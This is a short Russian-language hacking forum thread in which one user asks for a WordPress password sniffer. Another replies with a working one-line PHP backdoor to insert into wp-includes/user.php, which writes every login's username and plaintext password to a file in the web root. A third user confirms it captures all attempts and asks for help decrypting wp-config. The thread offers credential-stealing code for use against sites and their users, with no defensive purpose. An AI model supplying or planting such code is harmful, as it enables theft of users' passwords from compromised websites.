сниффер wp-login.php

Discussion in 'Уязвимости' started by jakonda1001, 21 Oct 2019.

  1. jakonda1001

    jakonda1001 New Member

    Joined:
    17 Mar 2016
    Messages:
    181
    Likes Received:
    4
    Reputations:
    0
    есть у кого сниффер паролей wordpress , в файл что бы сохранял?
     
  2. ckpunmkug

    ckpunmkug Member

    Joined:
    20 Mar 2017
    Messages:
    53
    Likes Received:
    35
    Reputations:
    2
    В файле wp-includes/user.php находим функцию
    Code:
    function wp_authenticate_username_password( $user, $username, $password )
    И в самом конце функции (строка примерно 187) перед
    Code:
    return $user;
    Вставляем строку
    Code:
    file_put_contents("{$_SERVER['DOCUMENT_ROOT']}/passwords", "{$username}:{$password}\n", FILE_APPEND);
    И снифер готов.
    Если нужно ещё с неудачными логинами то строку разместить после
    Code:
    $user = apply_filters( 'wp_authenuicate_user', $user, $password );
     
    winstrool and Nibiru like this.
  3. jakonda1001

    jakonda1001 New Member

    Joined:
    17 Mar 2016
    Messages:
    181
    Likes Received:
    4
    Reputations:
    0
    Спасибо большое
     
  4. Nibiru

    Nibiru New Member

    Joined:
    13 Jun 2019
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Я вставил сразу после
    function wp_authenticate_username_password( $user, $username, $password )

    Сохраняет все попытки.
    Спасибо большое.
    Пор расшифровке wp-config кто-то что-то подскажет?
     
Loading...